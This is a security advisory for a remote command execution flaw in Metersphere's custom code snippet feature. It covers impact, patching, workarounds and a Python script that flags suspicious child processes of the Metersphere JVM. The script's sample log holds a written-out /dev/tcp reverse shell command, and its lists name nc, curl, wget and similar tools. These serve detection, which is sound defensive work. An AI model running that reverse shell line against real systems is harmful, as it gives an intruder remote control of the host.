CVE-2023-29944

9.8 CRITICAL

📋 TL;DR

Metersphere v1.20.20-lts-79d354a6 contains a remote command execution (RCE) vulnerability in the custom code snippet function of the system workbench. An attacker who can reach that function can run arbitrary operating-system commands on the host, which is enough to take full control of the server and anything reachable from it.

💻 Affected Systems

Products:
  • Metersphere
Versions: v1.20.20-lts-79d354a6
Operating Systems: All platforms running Metersphere
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default configuration of the affected version. Any instance with the custom code snippet function enabled is vulnerable.

📦 What is this software?

Metersphere is an open-source continuous testing platform (API testing, performance/load testing, test case management) with a Java backend that is usually deployed as a set of containers. The custom code snippet feature lets users supply script that the server runs as part of test execution; because that script runs on the Metersphere host, a flaw in how it is sandboxed or validated translates directly into command execution on the server.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete system compromise allowing attackers to execute arbitrary commands, install malware, exfiltrate data, pivot to internal networks, and maintain persistent access.

🟠 Likely Case: Attackers gain shell access to the Metersphere server, allowing them to steal credentials (including any stored for the systems under test), manipulate test data, and potentially access connected systems.

🟢 If Mitigated: Limited impact due to network segmentation, strict access controls, and monitoring that detects exploitation attempts.

🌐 Internet-Facing: HIGH - Remote exploitation without authentication makes internet-facing instances extremely vulnerable to automated attacks.
🏢 Internal Only: HIGH - Even internal instances are vulnerable to insider threats or attackers who breach perimeter defenses.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability allows remote command execution without authentication. Public proof-of-concept references exist, making exploitation straightforward for attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check Metersphere GitHub repository for latest secure version

Vendor Advisory: https://github.com/metersphere/metersphere

Restart Required: Yes

Instructions:

1. Check the current Metersphere version.
2. Update to the latest secure version from the official repository.
3. Restart the Metersphere services.
4. Verify the fix by testing the custom code snippet function.

🔧 Temporary Workarounds

Disable Custom Code Snippet Function

Platform: all

Temporarily disable the vulnerable custom code snippet function in the system workbench until the instance is upgraded. If the feature cannot be switched off in the workbench, block the routes that serve it at the reverse proxy in front of Metersphere.

Network Access Restrictions

Platform: all

Restrict access to the Metersphere interface to trusted IP addresses only.

Configure firewall rules to limit access to the Metersphere port, and in particular remove any direct internet exposure; the exploit needs nothing more than network reachability.

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate Metersphere from critical systems
  • Run Metersphere under a dedicated low-privilege account or container with no credentials for other systems, so a compromise of the test platform stays contained
  • Enable comprehensive logging and monitoring for suspicious command execution attempts

🔍 How to Verify

Check if Vulnerable:

Check whether the instance is running Metersphere v1.20.20-lts-79d354a6. On instances you own, confirm in a controlled way (a harmless command such as `id`) whether the custom code snippet function allows operating-system command execution.

Check Version:

Check Metersphere web interface or configuration files for version information

Verify Fix Applied:

After patching, repeat the same harmless command through the custom code snippet function and confirm that it is rejected or sandboxed rather than executed on the host.

📡 Detection & Monitoring

Log Indicators:

  • Custom code snippets created or executed in Metersphere from unexpected accounts or source addresses
  • Process creation where the parent is the Metersphere Java process and the child is a shell, interpreter or download tool (sh, bash, curl, wget, nc, python, perl)
  • Exploitation may require no authentication, so do not rely on failed-login events as a precursor signal

Network Indicators:

  • Unexpected outbound connections from the Metersphere server, especially to uncommon ports
  • Reverse shell connections originating from the Metersphere server toward attacker-controlled hosts (the connection is outbound from the server, not inbound to the Metersphere port)

SIEM Query:

search 'Metersphere' AND ('command execution' OR 'reverse shell' OR 'system call')

This keyword search is only a starting point; the more reliable source is process-creation telemetry (auditd, Sysmon for Linux, or an EDR) filtered on child processes of the Metersphere JVM.
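The process-creation check described above, written out as an added detection example. This is not code from the advisory or from the Metersphere project; it assumes process-creation events have been exported to a key=value line format (constructed below for illustration), and the names SUSPECT_CHILDREN and SUSPECT_ARGS are starting lists to tune for your environment.

```python
"""Flag suspicious child processes of the Metersphere JVM.

Added example, not part of the advisory or the Metersphere project.
Assumption: process-creation events are available as one key=value line
per event (format constructed below); adapt LINE_RE to whatever your
auditd / Sysmon / EDR pipeline actually emits.
"""
import re
from typing import Dict, List, Optional

# Shells, interpreters and download tools that a test platform's JVM has no
# business spawning (assumption: tune to your deployment).
SUSPECT_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat",
                    "socat", "python", "python3", "perl", "busybox"}

# Command-line fragments typical of reverse shells and payload staging.
SUSPECT_ARGS = ("/dev/tcp/", "bash -i", "nc -e", "| sh", "| bash", "base64 -d")

# Constructed event format: timestamp, parent pid + cmdline, child pid/comm/cmdline.
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+ppid=(?P<ppid>\d+)\s+pcmdline="(?P<pcmdline>[^"]*)"\s+'
    r'pid=(?P<pid>\d+)\s+comm=(?P<comm>\S+)\s+cmdline="(?P<cmdline>[^"]*)"$'
)


def is_metersphere_parent(pcmdline: str) -> bool:
    """True if the parent looks like the Metersphere JVM.

    Assumption: the jar path or main class contains 'metersphere'.
    """
    return "java" in pcmdline and "metersphere" in pcmdline.lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the event is suspicious, else None."""
    if not is_metersphere_parent(event["pcmdline"]):
        return None  # not our process tree; ignore
    reasons = []
    if event["comm"] in SUSPECT_CHILDREN:
        reasons.append(f"{event['comm']} spawned by Metersphere JVM")
    hits = [p for p in SUSPECT_ARGS if p in event["cmdline"]]
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    return "; ".join(reasons) or None


def scan(text: str) -> List[Dict[str, object]]:
    """Parse exported events and return the ones worth alerting on."""
    alerts: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; skip rather than crash the pipeline
        ev = m.groupdict()
        reason = classify(ev)
        if reason:
            alerts.append({"ts": ev["ts"], "pid": int(ev["pid"]),
                           "comm": ev["comm"], "cmdline": ev["cmdline"],
                           "reason": reason})
    return alerts


# Constructed sample: a legitimate JMeter child, two malicious children of the
# Metersphere JVM, and an unrelated interactive shell under sshd.
LOG = """\
2023-04-20T10:15:30Z ppid=1 pcmdline="/usr/bin/dockerd" pid=1200 comm=java cmdline="java -jar /opt/metersphere/metersphere.jar"
2023-04-20T10:15:31Z ppid=1200 pcmdline="java -jar /opt/metersphere/metersphere.jar" pid=1340 comm=java cmdline="java -jar /opt/jmeter/bin/ApacheJMeter.jar -n"
2023-04-20T10:16:02Z ppid=1200 pcmdline="java -jar /opt/metersphere/metersphere.jar" pid=1355 comm=sh cmdline="sh -c id"
2023-04-20T10:16:05Z ppid=1200 pcmdline="java -jar /opt/metersphere/metersphere.jar" pid=1356 comm=bash cmdline="bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"
2023-04-20T10:16:09Z ppid=2210 pcmdline="/usr/sbin/sshd -D" pid=1357 comm=bash cmdline="bash -l"
"""

if __name__ == "__main__":
    for a in scan(LOG):
        print(f"{a['ts']} pid={a['pid']} {a['comm']}: {a['reason']}")
```

Expect two alerts from the sample (the `sh -c id` probe and the `/dev/tcp/` reverse shell); the JMeter child and the sshd shell are ignored. If your deployment legitimately spawns helpers from the JVM, add them to an allow-list rather than widening SUSPECT_CHILDREN.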
